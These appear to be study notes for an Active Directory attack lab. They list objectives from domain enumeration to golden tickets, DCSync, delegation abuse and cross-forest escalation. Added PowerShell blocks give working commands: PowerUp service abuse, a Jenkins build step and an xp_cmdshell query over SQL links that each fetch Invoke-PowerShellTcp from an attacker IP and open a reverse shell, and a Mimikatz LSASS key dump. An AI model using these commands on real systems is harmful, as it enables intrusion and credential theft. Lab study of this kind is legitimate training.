# Methodology

<details>

<summary>OBJECTIVES</summary>

### Learning Objective 1:

- Enumerate the following for the dollarcorp domain:
  - Users
  - Computers
  - Domain Administrators
  - Enterprise Administrators

### Learning Objective 2:

- Enumerate the following for the dollarcorp domain:
  - List all the OUs
  - List all the computers in the StudentMachines OU
  - List the GPOs
  - Enumerate the GPO applied on the StudentMachines OU

### Learning Objective 3:

- Enumerate the following for the dollarcorp domain:
  - ACL for the Domain Admins group
  - All modify rights/permissions for studentx

### Learning Objective 4:

- Enumerate all domains in the moneycorp.local forest.
- Map the trusts of the dollarcorp.moneycorp.local domain.
- Map external trusts in the moneycorp.local forest.
- Identify external trusts of the dollarcorp domain. Can you enumerate trusts for a trusting forest?
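
Added example for Learning Objectives 1 to 4 (this is not code from the original page or from the lab authors): one PowerView session that covers users, computers, admin groups, OUs, GPO links, ACLs and trust mapping. It assumes PowerView.ps1 (PowerSploit dev branch) is loaded and that you run as a dollarcorp domain user; `$student` and the `eurocorp.local` name in the last line are placeholders, and `Enterprise Admins` is queried in the forest root because that is where the group lives.

```powershell
# Added example (not from the original page): PowerView enumeration for Learning Objectives 1-4.
# Assumes PowerView.ps1 is loaded and the current logon is a dollarcorp domain user.
. .\PowerView.ps1

$domain  = 'dollarcorp.moneycorp.local'
$forest  = 'moneycorp.local'
$student = 'studentx'        # replace x with your student number (placeholder)

# LO1: users, computers, Domain Admins, Enterprise Admins (EA is a forest-root group)
Get-DomainUser     -Domain $domain | Select-Object -ExpandProperty samaccountname
Get-DomainComputer -Domain $domain | Select-Object -ExpandProperty dnshostname
Get-DomainGroupMember -Identity 'Domain Admins'     -Domain $domain -Recurse | Select-Object MemberName
Get-DomainGroupMember -Identity 'Enterprise Admins' -Domain $forest -Recurse | Select-Object MemberName

# LO2: OUs, computers inside StudentMachines, all GPOs, and the GPO(s) linked to that OU
Get-DomainOU -Domain $domain | Select-Object -ExpandProperty name
$ou = Get-DomainOU -Identity 'StudentMachines' -Domain $domain
Get-DomainComputer -SearchBase $ou.distinguishedname | Select-Object -ExpandProperty dnshostname
Get-DomainGPO -Domain $domain | Select-Object displayname, name
# gPLink looks like "[LDAP://cn={GUID},cn=policies,cn=system,DC=...;0]"; pull each linked GPO DN out of it
[regex]::Matches($ou.gplink, 'LDAP://([^;\]]+)') | ForEach-Object {
    Get-DomainGPO -Identity $_.Groups[1].Value -Domain $domain | Select-Object displayname, gpcfilesyspath
}

# LO3: ACL on the Domain Admins object, then every "interesting" (modify-class) ACE held by the student
Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs -Domain $domain |
    Select-Object ActiveDirectoryRights, ObjectAceType,
                  @{ n = 'Principal'; e = { ConvertFrom-SID $_.SecurityIdentifier } }
Find-InterestingDomainAcl -ResolveGUIDs -Domain $domain |
    Where-Object { $_.IdentityReferenceName -match $student }

# LO4: forest domains and trust mapping; external trusts carry the FILTER_SIDS attribute
Get-ForestDomain -Forest $forest | Select-Object Name
Get-DomainTrust  -Domain $domain
Get-ForestTrust  -Forest $forest
Get-DomainTrust  -Domain $domain | Where-Object { $_.TrustAttributes -match 'FILTER_SIDS' }
# A trusting forest can be enumerated only if the trust direction lets us authenticate into it.
# Try it against the forest named in the external-trust output above (the name here is a placeholder):
Get-DomainTrust  -Domain 'eurocorp.local'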

### Learning Objective 5:

- Exploit a service on dcorp-studentx and elevate privileges to local administrator.
- Identify a machine in the domain where studentx has local administrative access.
- Using the privileges of a user on Jenkins at 172.16.3.11:8080, get admin privileges on 172.16.3.11, the dcorp-ci server.

### Learning Objective 7:

- Identify a machine in the target domain where a Domain Admin session is available.
- Compromise the machine and escalate privileges to Domain Admin:
  - Using access to dcorp-ci
  - Using derivative local admin
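
Added example for Learning Objectives 5 and 7 (not code from the original page or the lab authors): service abuse with PowerUp, local-admin and Domain Admin session hunting with PowerView, and the shape of a Jenkins build-step reverse shell. It assumes PowerUp.ps1, PowerView.ps1, Find-PSRemotingLocalAdminAccess.ps1 and Invoke-Mimikatz.ps1 are on disk; the service name, the attacker IP and the listener port are placeholders because the page does not name them.

```powershell
# Added example (not from the original page): local privesc and lateral movement for LO5 and LO7.
# Service name, attacker IP and port are placeholders.
. .\PowerUp.ps1
. .\PowerView.ps1
. .\Find-PSRemotingLocalAdminAccess.ps1
. .\Invoke-Mimikatz.ps1

$student = 'studentx'          # placeholder
$service = '<vulnerable-service>'   # name reported by Invoke-AllChecks (placeholder)

# LO5 (a): find a misconfigured service on dcorp-studentx and use it to add the student to local Administrators
Invoke-AllChecks
Invoke-ServiceAbuse -Name $service -UserName "dcorp\$student" -Verbose   # log off/on to pick up the group

# LO5 (b): where else in the domain is the student a local admin?
Find-PSRemotingLocalAdminAccess -Verbose   # WinRM-based; quieter than the SMB-based check below
Find-LocalAdminAccess -Verbose

# LO5 (c): a Jenkins build step runs as the Jenkins service account on dcorp-ci (172.16.3.11).
# Paste this into an "Execute Windows batch command" build step; the listener waits on <attacker-ip>:443.
$buildStep = 'powershell.exe iex (iwr http://<attacker-ip>/Invoke-PowerShellTcp.ps1 -UseBasicParsing); ' +
             'Invoke-PowerShellTcp -Reverse -IPAddress <attacker-ip> -Port 443'
$buildStep

# LO7: machines with a Domain Admin session where we also hold local admin (CheckAccess tests admin rights)
Find-DomainUserLocation -UserGroupIdentity 'Domain Admins' -CheckAccess

# On such a machine (or on dcorp-ci once we are admin there) the DA credential material is in LSASS.
# Prefer the AES keys over the NTLM hash: they let Rubeus request tickets without RC4 downgrade noise.
Invoke-Mimikatz -Command '"sekurlsa::ekeys"'
```

Design note: the order matters. `Invoke-AllChecks` and the local-admin hunters run as the low-privileged student, while the credential dump only works after the local Administrators membership (or the Jenkins shell) is in place.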

### Learning Objective 8:

- Extract secrets from the domain controller of dollarcorp.
- Using the secrets of the krbtgt account, create a Golden ticket.
- Use the Golden ticket to (once again) get domain admin privileges from a machine.

### Learning Objective 9:

- Try to get command execution on the domain controller by creating a silver ticket for:
  - HOST service
  - WMI

### Learning Objective 10:

- Use Domain Admin privileges obtained earlier to execute the Diamond Ticket attack.

### Learning Objective 11:

- Use Domain Admin privileges obtained earlier to abuse the DSRM credential for persistence.

### Learning Objective 12:

- Check if studentx has Replication (DCSync) rights.
- If yes, execute the DCSync attack to pull hashes of the krbtgt user.
- If no, add the replication rights for studentx and execute the DCSync attack to pull hashes of the krbtgt user.

### Learning Objective 13:

- Modify security descriptors on dcorp-dc to get access using PowerShell remoting and WMI without requiring administrator access.
- Retrieve the machine account hash from dcorp-dc without using administrator access and use it to execute a Silver Ticket attack to get code execution with WMI.

### Learning Objective 14:

- Using the Kerberoast attack, crack the password of a SQL server service account.

### Learning Objective 15:

- Find a server in the dcorp domain where Unconstrained Delegation is enabled.
- Compromise the server and escalate to Domain Admin privileges.
- Escalate to Enterprise Admins privileges by abusing the Printer Bug!

### Learning Objective 16:

- Enumerate users in the domain for whom Constrained Delegation is enabled.
  - For such a user, request a TGT from the DC and obtain a TGS for the service to which delegation is configured.
  - Pass the ticket and access the service.
- Enumerate computer accounts in the domain for which Constrained Delegation is enabled.
  - For such a computer account, request a TGT from the DC.
  - Obtain an alternate TGS for the LDAP service on the target machine.
  - Use the TGS for executing the DCSync attack.

### Learning Objective 17:

- Find a computer object in the dcorp domain where we have Write permissions.
- Abuse the Write permissions to access that computer as Domain Admin.

### Learning Objective 18:

- Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA to the parent domain, moneycorp.local, using the domain trust key.

### Learning Objective 19:

- Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA to the parent domain, moneycorp.local, using dollarcorp's krbtgt hash.

### Learning Objective 20:

- With DA privileges on dollarcorp.moneycorp.local, get access to the SharedwithDCorp share on the DC of the eurocorp.local forest.

### Learning Objective 21:

- Check if AD CS is used by the target forest and find any vulnerable/abusable templates.
- Abuse any such template(s) to escalate to Domain Admin and Enterprise Admin.

### Learning Objective 22:

- Get a reverse shell on a SQL server in the eurocorp forest by abusing database links from dcorp-mssql.
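
Added example for Learning Objective 22 (not code from the original page or the lab authors): discovering and crawling SQL Server links from dcorp-mssql with PowerUpSQL, enabling `xp_cmdshell` on the far end through `EXECUTE ... AT`, and running a reverse shell there. The link name toward the eurocorp SQL server, the attacker IP and the listener port are placeholders; PowerUpSQL is assumed to be on disk.

```powershell
# Added example (not from the original page): database-link abuse for LO22. Placeholders in <angle brackets>.
Import-Module .\PowerUpSQL.psd1

# which instances does the current domain user reach, and what does dcorp-mssql link to?
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded | Where-Object { $_.Status -eq 'Accessible' }
Get-SQLServerLink -Instance dcorp-mssql -Verbose

# follow every link hop and report who we are on each server (links to other forests show up here)
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'select system_user as login, @@servername as srv' -Verbose

# xp_cmdshell is normally disabled; turn it on at the eurocorp end through the link. Needs sysadmin on
# the far side (the link's mapped login) and RPC Out enabled on the link. Doubled quotes are T-SQL escapes.
$link   = '<eurocorp-sql-link>'    # placeholder: name from Get-SQLServerLink
$enable = "EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT ""$link"""
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query $enable

# reverse shell from the eurocorp SQL server back to the attacker (Nishang Invoke-PowerShellTcp, port 443)
$shell = 'powershell.exe -c "iex (iwr http://<attacker-ip>/Invoke-PowerShellTcp.ps1 -UseBasicParsing); ' +
         'Invoke-PowerShellTcp -Reverse -IPAddress <attacker-ip> -Port 443"'
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell '$shell'"
```

Caveat: the crawl runs the query on every hop, so `whoami`-style checks first; once `xp_cmdshell` is on, the same `exec master..xp_cmdshell` executes on each linked server that allows it, not only the eurocorp one.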

</details>

## Enumeration

1. Domain, Domain Controller, Forest & Trust mapping
2. Users & computers
3. Groups & group members

## Privesc 'own user' => Local Admin

- Learning Objective 5: service exploitation, local admin hunting, Jenkins on dcorp-ci

## Privesc Local Admin => Domain Admin

- Learning Objective 7: Domain Admin session
- Learning Objective 17: abusing Write permission (ACL)

## Domain Admin persistence

- Learning Objective 8: golden ticket
- Learning Objective 9: silver ticket
- Learning Objective 10: diamond ticket

## Using Domain Admin to exploit other services

- Learning Objective 11: abusing DSRM
- Learning Objective 12: DCSync (replication rights)
- Learning Objective 13: security descriptors & machine account hash from the DC
- Learning Objective 14: Kerberoast attack
- Learning Objective 15: Unconstrained Delegation (and the Printer Bug)
- Learning Objective 16: Constrained Delegation
- Learning Objective 21: AD CS template abuse

## Cross Forest Attacks

- Learning Objective 18: Domain Admin => forest DC or EA using the trust key
- Learning Objective 19: Domain Admin => forest DC or EA using the krbtgt hash
- Learning Objective 20: Domain Admin => eurocorp DC, SharedwithDCorp share
- Learning Objective 22: Domain Admin => eurocorp SQL server via database links from dcorp-mssql

